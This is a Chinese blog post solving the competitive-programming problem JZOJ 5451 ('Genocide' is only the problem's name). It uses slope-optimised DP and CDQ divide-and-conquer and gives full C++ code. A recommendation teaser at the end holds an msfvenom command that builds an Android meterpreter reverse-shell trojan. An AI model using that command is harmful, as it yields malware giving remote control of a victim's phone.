题目

题解

对于 \(m=1\) 这档分

我们可以 \(dp\) 然后斜率优化

具体来说就是 \(f_i = f_j + \frac{(i-j)\times (i-j+1)}{2} + sum[j]-sum[i]\)

很容易斜率优化

那么 \(m=3\times 10^5\) 时

考虑 \(cdq\) 分治

考虑 \(dp\) 出一个如上定义的前缀 \(f\) 和同理的后缀 \(g\)

设 \(h_x\) 表示强制选 \(x\) 时的最大收益,\(h_x = f_i+g_j-sum_{j-1}+sum_i+\frac{(j-i)\times(j-i-1)}{2}(i < x <j)\)

这个 \(O(n^2)\) 显然不行

记 \(F_i = f_i+\frac{i \times (i-1)}{2}+sum_i,G_i = g_i + \frac{i \times (i-1)}{2}-sum_{i-1}\)

则 \(h_x = F_i + G_j - i \times j(i < x < j)\)

对于区间 \([l,r]\),我们讨论 \([l,mid]\) 的 \(h\) 值

对于一个 \(l\le x\le mid\),它的 \(h\) 值 \(i\) 决策在它左边,\(j\) 决策 \(mid\) 右边

我们考虑对 \(j\) 决策斜率优化,\(i\) 递增,和 \(f,g\) 的算法有异曲同工之妙

然后通过一些玄学操作同理处理决策 \(i\)

最后答案就是 \(\max(f_{p-1}+g_{p+1},h_p+a_p-x)\)

\(Code\)

#include<cstdio>
#include<cstring>
#include<algorithm>
#include<iostream>
#define LL long long
using namespace std; const int N = 3e5 + 5;
const LL INF = 0x3f3f3f3f3f3f3f3f;
int n, m, a[N], Q[N];
LL sum[N], f[N], g[N], F[N], G[N], h[N], w[N]; inline double slope(LL *f, int j, int k)
{
return 1.0 * ((f[j] + (1LL * j * j - j) / 2.0 + sum[j]) - (f[k] + (1LL * k * k - k) / 2.0 + sum[k])) / (j - k);
}
inline void dp(LL *f)
{
memset(f, 0, sizeof f);
int top;
Q[top = 1] = 0;
for(register int i = 1; i <= n; i++)
{
while (top > 1 && slope(f, Q[top - 1], Q[top]) < i) --top;
f[i] = max(f[i - 1], f[Q[top]] + 1LL * (i - Q[top]) * (i - Q[top] + 1) / 2 - sum[i] + sum[Q[top]]);
while (top && slope(f, Q[top - 1], Q[top]) < slope(f, Q[top], i)) --top;
Q[++top] = i;
}
} inline double slope(int j, int k){return 1.0 * (G[j] - G[k]) / (j - k);}
void divide(int l, int r, int p)
{
int mid = (l + r) >> 1, top = 0;
for(register int i = mid + 1; i <= r; i++)
{
while (top > 1 && slope(Q[top - 1], Q[top]) < slope(Q[top], i)) --top;
Q[++top] = i;
}
w[l - 1] = -INF;
for(register int i = l; i <= mid; i++)
{
while (top > 1 && slope(Q[top - 1], Q[top]) < i) --top;
w[i] = max(w[i - 1], F[i] + G[Q[top]] - 1LL * i * Q[top]);
}
if (p) for(register int i = l; i <= mid; i++) h[n - i + 1] = max(h[n - i + 1], w[i - 1]);
else for(register int i = l; i <= mid; i++) h[i] = max(h[i], w[i - 1]);
if (l ^ r) divide(l, mid, p), divide(mid + 1, r, p);
} void solve()
{
for(register int i = 1; i <= n; i++) sum[i] = sum[i - 1] + a[i];
dp(f);
reverse(a + 1, a + n + 1);
for(register int i = 1; i <= n; i++) sum[i] = sum[i - 1] + a[i];
dp(g); reverse(f + 1, f + n + 1);
for(register int i = 1; i <= n; i++) swap(f[i], g[i]);
for(register int i = 0; i <= n + 1; i++) F[i] = f[i] + 1LL * i * (i + 1) / 2 + sum[i], G[i] = g[i] + 1LL * i * (i - 1) / 2 - sum[i - 1];
for(register int i = 1; i <= n; i++) h[i] = -INF;
divide(0, n + 1, 1); for(register int i = 1; i <= n; i++) swap(f[i], g[i]);
reverse(a + 1, a + n + 1), reverse(f + 1, f + n + 1), reverse(g + 1, g + n + 1);
for(register int i = 1; i <= n; i++) sum[i] = sum[i - 1] + a[i];
for(register int i = 0; i <= n + 1; i++) F[i] = f[i] + 1LL * i * (i + 1) / 2 + sum[i], G[i] = g[i] + 1LL * i * (i - 1) / 2 - sum[i - 1];
divide(0, n + 1, 0);
} int main()
{
freopen("genocide.in", "r", stdin);
freopen("genocide.out", "w", stdout);
scanf("%d", &n);
for(register int i = 1; i <= n; i++) scanf("%d", &a[i]);
solve();
scanf("%d", &m);
for(int p, x; m; --m)
{
scanf("%d%d", &p, &x);
printf("%lld\n", max(f[p - 1] + g[p + 1], h[p] + a[p] - x));
}
}

JZOJ 5451.Genocide的更多相关文章

  1. hdu 5451 Best Solver 矩阵循环群+矩阵快速幂

    http://acm.hdu.edu.cn/showproblem.php?pid=5451 题意:给定x    求解 思路: 由斐波那契数列的两种表示方法, 之后可以转化为 线性表示 F[n] = ...

  2. (jzoj snow的追寻)线段树维护树的直径

    jzoj snow的追寻 DFS序上搞 合并暴力和,记录最长链和当前最远点,距离跑LCA # include <stdio.h> # include <stdlib.h> # ...

  3. [jzoj]3506.【NOIP2013模拟11.4A组】善良的精灵(fairy)(深度优先生成树)

    Link https://jzoj.net/senior/#main/show/3506 Description 从前有一个善良的精灵. 一天,一个年轻人B找到她并请他预言他的未来.这个精灵透过他的水 ...

  4. [jzoj]3468.【NOIP2013模拟联考7】OSU!(osu)

    Link https://jzoj.net/senior/#main/show/3468 Description osu 是一款群众喜闻乐见的休闲软件. 我们可以把osu的规则简化与改编成以下的样子: ...

  5. [jzoj]5478.【NOIP2017提高组正式赛】列队

    Link https://jzoj.net/senior/#main/show/5478 Description Sylvia 是一个热爱学习的女孩子.       前段时间,Sylvia 参加了学校 ...

  6. [jzoj]1115.【HNOI2008】GT考试

    Link https://jzoj.net/senior/#main/show/1115 Description 申准备报名参加GT考试,准考证号为n位数X1X2X3...Xn-1Xn(0<=X ...

  7. [jzoj]2538.【NOIP2009TG】Hankson 的趣味题

    Link https://jzoj.net/senior/#main/show/2538 Description Hanks 博士是BT (Bio-Tech,生物技术) 领域的知名专家,他的儿子名叫H ...

  8. [jzoj]4216.【NOIP2015模拟9.12】平方和

    Link https://jzoj.net/senior/#main/show/4216 Description 给出一个N个整数构成的序列,有M次操作,每次操作有一下三种: ①Insert Y X, ...

  9. [jzoj]2938.【NOIP2012模拟8.9】分割田地

    Link https://jzoj.net/senior/#main/show/2938 Description 地主某君有一块由2×n个栅格组成的土地,有k个儿子,现在地主快要终老了,要把这些土地分 ...

  10. [jzoj]2505.【NOIP2011模拟7.29】藤原妹红

    Link https://jzoj.net/senior/#main/show/2505 Description 在幻想乡,藤原妹红是拥有不老不死能力的人类.虽然不喜欢与人们交流,妹红仍然保护着误入迷 ...

随机推荐

  1. Linux配置ipv6脚本

    #!/bin/bash REMOTE_IP6="2001:da8:900c:eeee:0:5efe" REMOTE_IP4="" #填你自己学校的路由隧道的ip ...

  2. CmakeLists简单使用总结

    单文件工程和多级目录工程CmakeLists.txt编写分享 你若发现该帖中有待商榷的地方,还请指正赐教,先行拜谢了! 1 main.c单文件工程CmakeLists.txt 1.1 目录结构 1.2 ...

  3. Qwt开发笔记(一):Qwt简介、下载以及基础demo工程模板

    前言   QWT开发笔记系列整理集合,这是目前使用最为广泛的Qt图表类(Qt的QWidget代码方向只有QtCharts,Qwt,QCustomPlot),使用多年,系统性的整理,本系列旨在系统解说并 ...

  4. 【实时数仓】Day06-数据可视化接口:接口介绍、Sugar大屏、成交金额、不同维度交易额(品牌、品类、商品spu)、分省的热力图 、新老顾客流量统计、字符云

    一.数据可视化接口介绍 1.设计思路 后把轻度聚合的结果保存到 ClickHouse 中后,提供即时的查询.统计.分析 展现形式:用于数据分析的BI工具[商业智能(Business Intellige ...

  5. Day36:List详解

    List 1.1 概述 List为Collection的子接口,代表的一组任意对象,有序,有下标.元素可以重复. 1.2 方法 方法名 说明 void add(int index,Object o) ...

  6. CCS选择器 选择器优先级 选择器常见属性

    目录 CSS前戏 1.css语法结构 2.css注释语法 3.引入css的多种方式 CSS基本选择器 1.标签选择器 2.类选择器 3.id选择器 4.通用选择器 CSS组合选择器 1.后代选择器(空 ...

  7. 铁威马NAS如何开启二次验证提高系统安全性

    想到登录TNAS时更安全?直接开启OTP二次验证,通过 TNAS mobile生成的一次性密码登录NAS存储,简单设置,提升TOS系统访问安全性给你TNAS双重保护. 1.首先,确认你的TOS系统在5 ...

  8. 监控Android(生成木马)

    生成木马: sudo su msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=IP地址 lport=端口号 R ...

  9. django.core.exceptions.ImproperlyConfigured: Field name `tester_id` is not valid for model `WebCase`.

    代码: class WebCase(models.Model): id = models.AutoField(primary_key=True) casename = models.CharField ...

  10. go语言行为(方法)的两种定义差别

    概述: go在定义方法时,有如下两种表示形式: 第一种,在实例方法被调用时,会产生值复制 func (e Employee) String() string {} 第二种,不会进行内存拷贝,所以通常情 ...